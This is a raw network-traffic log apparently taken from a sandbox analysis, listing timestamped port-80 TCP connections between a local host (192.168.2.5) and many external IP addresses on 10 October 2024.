                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.340173006 CEST805002918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.340225935 CEST5002980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.344738007 CEST805002918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.545799017 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.550864935 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.550940990 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.551043987 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.551054955 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.555886984 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.555919886 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.919369936 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.919903994 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.920017004 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.920073986 CEST5003080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.924707890 CEST805003013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.138325930 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143418074 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143513918 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143621922 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143646955 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.149029970 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.149566889 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521459103 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521652937 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521714926 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521778107 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.526798010 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.746541023 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.751569986 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753170967 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753678083 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753776073 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.758646965 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.758660078 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636487961 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636509895 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636575937 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636667013 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.641489029 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.941040993 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.945885897 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.945964098 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946084023 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946098089 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.951411963 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.951726913 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.302709103 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.302900076 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.303262949 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.303344965 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.307697058 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.524203062 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529119968 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529196024 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529721022 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529752970 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.534586906 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.534616947 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.906094074 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.906265020 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.906939030 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.907031059 CEST5003480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.911807060 CEST805003413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.240658998 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.245825052 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.246237993 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.246237993 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.246908903 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.251266956 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.251813889 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.830950022 CEST805001882.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.831084967 CEST5001880192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.831172943 CEST5001880192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.836327076 CEST805001882.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.900268078 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.905252934 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.906078100 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.906249046 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.906280994 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.911093950 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.911163092 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.971321106 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.971453905 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.971550941 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.971637011 CEST5003580192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.976557016 CEST805003534.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.251511097 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.256504059 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.256589890 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.270044088 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.270076990 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.275038958 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.275057077 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.742204905 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.742577076 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.742635012 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.743071079 CEST5003780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.747975111 CEST80500373.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.155745029 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.160703897 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.160840034 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.161293983 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.161312103 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.167699099 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.167707920 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.269949913 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.270081043 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.270112991 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.270164013 CEST5003680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.275671959 CEST805003647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.308892965 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313693047 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313759089 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313863993 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313888073 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.318681955 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.318691015 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.638771057 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.638784885 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.638848066 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.638961077 CEST5003880192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.644077063 CEST805003844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.800606012 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805453062 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805507898 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805876970 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.805902958 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.810689926 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.810700893 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.574239016 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.574301958 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.574450970 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.574825048 CEST5004080192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.579277992 CEST80500403.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.708317995 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.708384991 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.708435059 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.708528042 CEST5003980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.713284969 CEST805003913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.948019981 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.952917099 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.953078032 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.953394890 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.953394890 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.958250046 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.958261013 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.100965977 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.105777979 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.105863094 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.105982065 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.106024981 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.110814095 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.110821962 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469376087 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469496965 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469517946 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469536066 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.474309921 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.681694984 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.686631918 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.686775923 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.694530010 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.694677114 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.731312990 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.773623943 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.153489113 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158416986 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158507109 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158731937 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158773899 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.163592100 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.163616896 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.016828060 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.016983032 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.017041922 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.017041922 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.022082090 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.063186884 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068008900 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068063021 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068244934 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068264008 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.073064089 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.073074102 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.497000933 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.498286963 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.498331070 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.500571966 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.505395889 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.551740885 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.551800966 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.553591013 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.558593035 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.592588902 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598108053 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598215103 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598443031 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598459959 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.603630066 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.603640079 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.687587023 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.692579985 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696106911 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696213007 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696228981 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.701101065 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.701119900 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.081779003 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.081970930 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.082851887 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.087698936 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.132436991 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.137557030 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.137847900 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.153228998 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.153244019 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428208113 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428278923 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428759098 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.542330980 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.547208071 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.871611118 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876507044 CEST805004947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876657009 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876770973 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876770973 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.881560087 CEST805004947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.881572962 CEST805004947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.941257954 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.941302061 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942817926 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942882061 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.947858095 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.955379009 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960244894 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960364103 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960459948 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.960459948 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.965293884 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.965317965 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.417134047 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.417223930 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.417270899 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.424300909 CEST5005080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.429168940 CEST805005018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.452656031 CEST5005180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.457643986 CEST8050051208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.457746029 CEST5005180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.458090067 CEST5005180192.168.2.5208.100.26.245
